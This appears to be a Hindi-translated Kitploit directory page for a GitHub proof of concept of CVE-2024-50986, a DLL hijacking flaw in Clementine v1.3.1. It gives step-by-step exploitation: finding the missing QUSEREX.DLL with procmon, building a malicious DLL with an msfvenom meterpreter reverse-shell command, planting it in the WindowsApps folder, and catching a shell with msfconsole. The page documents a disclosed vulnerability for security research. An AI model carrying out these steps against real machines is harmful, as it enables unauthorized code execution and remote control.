Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-50986 — Clementine v.1.3.1 में एक समस्या एक स्थानीय हमलावर को एक निर्मित DLL फ़ाइल (DLL हाइजैकिंग) के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/riftsandroses/cve-2024-50986
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडपोस्ट-शोषणपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubriftsandroses/cve-2024-50986

CVE-2024-50986

Clementine v.1.3.1 में एक समस्या एक स्थानीय हमलावर को एक निर्मित DLL फ़ाइल (DLL हाइजैकिंग) के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।

रिपॉजिटरी देखें
141 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-50986: Clementine के लिए DLL हाइजैकिंग शोषण

विवरण: Clementine v.1.3.1 में एक समस्या एक स्थानीय हमलावर को क्राफ्टेड DLL फ़ाइल के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।

प्रभावित संस्करण: Clementine v.1.3.1

शोधकर्ता: Utkarsh (r1971d3) LinkedIn

NIST CVE लिंक: https://nvd.nist.gov/vuln/detail/CVE-2024-50986

कमजोरी का प्रकार: अविश्वसनीय खोज पथ

प्रभावित घटक: QUSEREX.DLL

प्रूफ-ऑफ-कॉन्सेप्ट शोषण

हमला वेक्टर

इस कमजोरी का फायदा उठाने के लिए, एक हमलावर को QUSEREX.DLL नामक एक दुर्भावनापूर्ण DLL बनाना होगा और इसे निर्देशिका C:\Users<username>\AppData\Local\Microsoft\WindowsApps\ में रखना होगा। जब Clementine एप्लिकेशन लॉन्च किया जाता है, तो यह दुर्भावनापूर्ण DLL को लोड करेगा, जिससे हमलावर का कोड निष्पादित होगा।

विवरण और उपयोग

  1. विंडोज ऑपरेटिंग सिस्टम में लापता DLL की पहचान करने और Clementine द्वारा उनकी खोज के स्थानों को ट्रैक करने के लिए उपयुक्त फिल्टर के साथ प्रोसेस मॉनिटर (procmon) का उपयोग करें

Capture_3

  1. खोज से पता चलता है कि DLL "QUSEREX.DLL" को कई स्थानों पर खोजा जा रहा है, जिसमें C:\Users<username>\AppData\Local\Microsoft\WindowsApps\ शामिल है

Capture_4

  1. msfvenom का उपयोग करके निम्नलिखित कमांड के साथ एक दुर्भावनापूर्ण DLL बनाया जाता है:
root@kitploit:~
sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL

Capture_5

  1. इस दुर्भावनापूर्ण DLL को निर्देशिका C:\Users<username>\AppData\Local\Microsoft\WindowsApps\ में रखा जाता है, जहां इसे Clementine द्वारा सफलतापूर्वक लोड किया जाता है।

Capture_6

  1. msfconsole का उपयोग करके, रिवर्स शेल के माध्यम से एक स्टेज्ड पेलोड भेजा जाता है, जिसके परिणामस्वरूप लक्ष्य मशीन पर C:\Program Files (x86)\Clementine\projectm-presets निर्देशिका में एक meterpreter शेल सत्र प्राप्त होता है।

Capture_7

Capture_8

टूल डाउनलोड करें